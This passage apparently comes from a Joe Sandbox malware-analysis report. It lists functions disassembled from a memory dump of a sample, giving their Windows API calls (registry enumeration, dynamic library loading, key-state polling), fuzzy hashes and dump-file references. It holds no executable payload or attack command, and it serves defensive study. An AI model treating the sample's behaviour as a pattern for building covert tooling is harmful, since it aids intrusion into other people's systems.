                                                                                                                    • Instruction Fuzzy Hash: EE113C31D0061DDBCF02AFE5D849AEEBBBCFF0A711F014096EA85B6240CB709552CB95
                                                                                                                    Function 00381AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00381B19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    • Opcode ID: 325dfdb5d1ff99d527f5b83c44ac8dabba9dbd1ab5f19968da107500a51a8c7c
                                                                                                                    • Instruction ID: c1ccaf6b75b37b656713ad706f2c96e6021ca3422d4c22392b317502bbb97df3
                                                                                                                    • Opcode Fuzzy Hash: 325dfdb5d1ff99d527f5b83c44ac8dabba9dbd1ab5f19968da107500a51a8c7c
                                                                                                                    • Instruction Fuzzy Hash: B01161759502189FCF06EFA4E8518FEB7B9FF26304F1044A5D814AB791EB326D06CB50
                                                                                                                    Function 0039EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0039EC07
                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0039EC37
                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0039ED6A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0039EDEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2364364464-0
                                                                                                                    • Opcode ID: 96ff5baf3ee6aef8a18d4b7a7f9daf0983fd77a70be4022fc0fa47753ffd985b
                                                                                                                    • Instruction ID: 760a34332d3b821247611b80ee8e1e888e98cb6bd0d0aca1e8231b6575e40bf9
                                                                                                                    • Opcode Fuzzy Hash: 96ff5baf3ee6aef8a18d4b7a7f9daf0983fd77a70be4022fc0fa47753ffd985b
                                                                                                                    • Instruction Fuzzy Hash: B0817271604710AFDB22EF28D886F2AB7E5AF48710F44881DF999DB2D2D7B0AC40CB51
                                                                                                                    Function 003A0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 003A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A00FD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A013C
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003A0183
                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 003A01AF
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A01BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3440857362-0
                                                                                                                    • Opcode ID: f20bdd448f4557f6e8445fe225aabf46a772335b3522d2c784bda559a5a510fc
                                                                                                                    • Instruction ID: e857101e2999bc85aad276143d509d187caf64a45f553a868aea265497a1358a
                                                                                                                    • Opcode Fuzzy Hash: f20bdd448f4557f6e8445fe225aabf46a772335b3522d2c784bda559a5a510fc
                                                                                                                    • Instruction Fuzzy Hash: F2519E71208204AFD71AEF54DC81FAAB7E8FF85314F40492DF5958B2A2DB31E944CB52
                                                                                                                    Function 0039D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0039D927
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0039D9AA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0039D9C6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0039DA07
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0039DA21
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00387896,?,?,00000000), ref: 00325A2C
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00387896,?,?,00000000,?,?), ref: 00325A50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327935632-0
                                                                                                                    • Opcode ID: af3def2d8d81bd6bd0434d655479207559f90958a09017f965e9d249a9ca6176
                                                                                                                    • Instruction ID: 5c0c8dd8be3ba134faf73b1939a6e74c8253a433889218f694ca47adc9251d1d
                                                                                                                    • Opcode Fuzzy Hash: af3def2d8d81bd6bd0434d655479207559f90958a09017f965e9d249a9ca6176
                                                                                                                    • Instruction Fuzzy Hash: 00512635A00219DFCB02EFA8D4859ADB7B8FF19320F058065E859AB312D730EE45CF90
                                                                                                                    Function 0038E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0038E61F
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0038E648
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0038E687
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0038E6AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0038E6B4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1389676194-0
                                                                                                                    • Opcode ID: 6777a454de7a0c37c5c3075c42d7aed11d8e9a65965adff8f2d4d283edd660da
                                                                                                                    • Instruction ID: 54354342b00896c3a96bb77813f0254d20421655b5c28580d8c8bf4fefe04430
                                                                                                                    • Opcode Fuzzy Hash: 6777a454de7a0c37c5c3075c42d7aed11d8e9a65965adff8f2d4d283edd660da
                                                                                                                    • Instruction Fuzzy Hash: 1A510A35A00215DFCB06EF64D981AADBBF5EF09314F1484A9E809AF361DB31ED51DB50
                                                                                                                    Function 003AA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0c9fa9c035b47f6c892b1cf74e253699dae828b1bfa1512a21f95a63bee29a5c
                                                                                                                    • Instruction ID: 7227582685858e91948dbd6e2144e0066e29d949ac55ec43fff9d7370e09461b
                                                                                                                    • Opcode Fuzzy Hash: 0c9fa9c035b47f6c892b1cf74e253699dae828b1bfa1512a21f95a63bee29a5c
                                                                                                                    • Instruction Fuzzy Hash: 9841D636904914BFD722DF78CC88FB9BBA8EB0B310F160265F816A72E1C730AD41DA51
                                                                                                                    Function 00322344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 00322357
                                                                                                                    • ScreenToClient.USER32(003E57B0,?), ref: 00322374
                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00322399
                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 003223A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: 12484a67f4882fb90d2d2f2049761de8c9a7b22b49b031dac69504a566fe9fd4
                                                                                                                    • Instruction ID: d133a937cc4b96cbd811f7d05f9e4aae31c91c32106bfb0c13185545727013b4
                                                                                                                    • Opcode Fuzzy Hash: 12484a67f4882fb90d2d2f2049761de8c9a7b22b49b031dac69504a566fe9fd4
                                                                                                                    • Instruction Fuzzy Hash: 16416039604215FFCF16DF68CC44EEABBB8FB06365F204319F929962A0C7349954DB91
                                                                                                                    Function 003763AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003763E7
                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00376433
                                                                                                                    • TranslateMessage.USER32(?), ref: 0037645C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00376466
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00376475
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2108273632-0
                                                                                                                    • Opcode ID: bcad81cf4d03155c4a0e8880b17b086e74116980a4a91fbaa92f2905b80742a8
                                                                                                                    • Instruction ID: 97dc05b1f372b6b6923682795d763a0cb0e124e7f5305fa3d06c2a073909bb6b
                                                                                                                    • Opcode Fuzzy Hash: bcad81cf4d03155c4a0e8880b17b086e74116980a4a91fbaa92f2905b80742a8
                                                                                                                    • Instruction Fuzzy Hash: 4531E731A00A42AFDB37CFB1CC96BF67BECAB01304F158269E529D60B1E7399845DB50
                                                                                                                    Function 00378A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00378A30
                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00378ADA
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00378AE2
                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00378AF0
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00378AF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: 885e04951e1c2aa86ef7d0af15fa2ad815645db30849f953892ce0c71ef04258
                                                                                                                    • Instruction ID: f32365d17bea19317cabf10485103cc8a5af046066561c0701157b2adfe93bf5
                                                                                                                    • Opcode Fuzzy Hash: 885e04951e1c2aa86ef7d0af15fa2ad815645db30849f953892ce0c71ef04258
                                                                                                                    • Instruction Fuzzy Hash: B631C071500219EFDF25CFA8D98CA9E7BB9EB05315F10822AF929EA1D0C7B49914DB90
                                                                                                                    Function 0037B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 0037B204
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0037B221
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0037B259
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0037B27F
                                                                                                                    • _wcsstr.LIBCMT ref: 0037B289
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902887630-0
                                                                                                                    • Opcode ID: 59fa890d077c7e4a91df42a11a569482211902e25a7d81793c8b8619fd230fed
                                                                                                                    • Instruction ID: 3e1ca374a2a150ff5904213782f822dd37392bd74d06317eabf171b2b7269094
                                                                                                                    • Opcode Fuzzy Hash: 59fa890d077c7e4a91df42a11a569482211902e25a7d81793c8b8619fd230fed
                                                                                                                    • Instruction Fuzzy Hash: EF21F531605200BBEB275B759C49F7FBBACDF4A710F018129F808DE162EF65DC4096A0
                                                                                                                    Function 003AB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AB192
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003AB1B7
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003AB1CF
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 003AB1F8
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00390E90,00000000), ref: 003AB216
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2294984445-0
                                                                                                                    • Opcode ID: e3518b1376b268baaf7517522c14993b11ef3ee2d86581f1bc73d0e82789db4b
                                                                                                                    • Instruction ID: abaf93030363a1de3a5ad4a17bc6a791d0a36d09ffc748f9b20aa0f280624c5a
                                                                                                                    • Opcode Fuzzy Hash: e3518b1376b268baaf7517522c14993b11ef3ee2d86581f1bc73d0e82789db4b
                                                                                                                    • Instruction Fuzzy Hash: 35219471A10261AFCB229F789C54B6A77A8FB07361F114B35F932D71E1E73098609B90
                                                                                                                    Function 00379307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00379320
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00379352
                                                                                                                    • __itow.LIBCMT ref: 0037936A
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00379392
                                                                                                                    • __itow.LIBCMT ref: 003793A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2983881199-0
                                                                                                                    • Opcode ID: 6779b8df5d1b559e7f605a3029d1d83ba4c866c22a24b3d3666ed86129e21ef3
                                                                                                                    • Instruction ID: 2a38ac7e86e470ef6fa434fcd6db04696b91667b9f66f1796ac2649dc13ba618
                                                                                                                    • Opcode Fuzzy Hash: 6779b8df5d1b559e7f605a3029d1d83ba4c866c22a24b3d3666ed86129e21ef3
                                                                                                                    • Instruction Fuzzy Hash: 0A210A35700214AFEB229E609C85FEE3BACEB49710F04802AFD08EB2D0D674CD418791
                                                                                                                    Function 00395A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00000000), ref: 00395A6E
                                                                                                                    • GetForegroundWindow.USER32 ref: 00395A85
                                                                                                                    • GetDC.USER32(00000000), ref: 00395AC1
                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00395ACD
                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00395B08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    • Opcode ID: 7a061868d35f8256e14d6b71f5e462d846011e3295fa855bcf1ad78cfb98efb1
                                                                                                                    • Instruction ID: 268c8a3e4ec17e5c84d402f6377e90e2c7ea7dc53b8d92c837d0de3b842ab597
                                                                                                                    • Opcode Fuzzy Hash: 7a061868d35f8256e14d6b71f5e462d846011e3295fa855bcf1ad78cfb98efb1
                                                                                                                    • Instruction Fuzzy Hash: 8921A135A00204AFDB16EFA5DC84A9ABBF9EF49310F148079F809D7362CA70EC40CB90
                                                                                                                    Function 003212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0032134D
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0032135C
                                                                                                                    • BeginPath.GDI32(?), ref: 00321373
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0032139C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
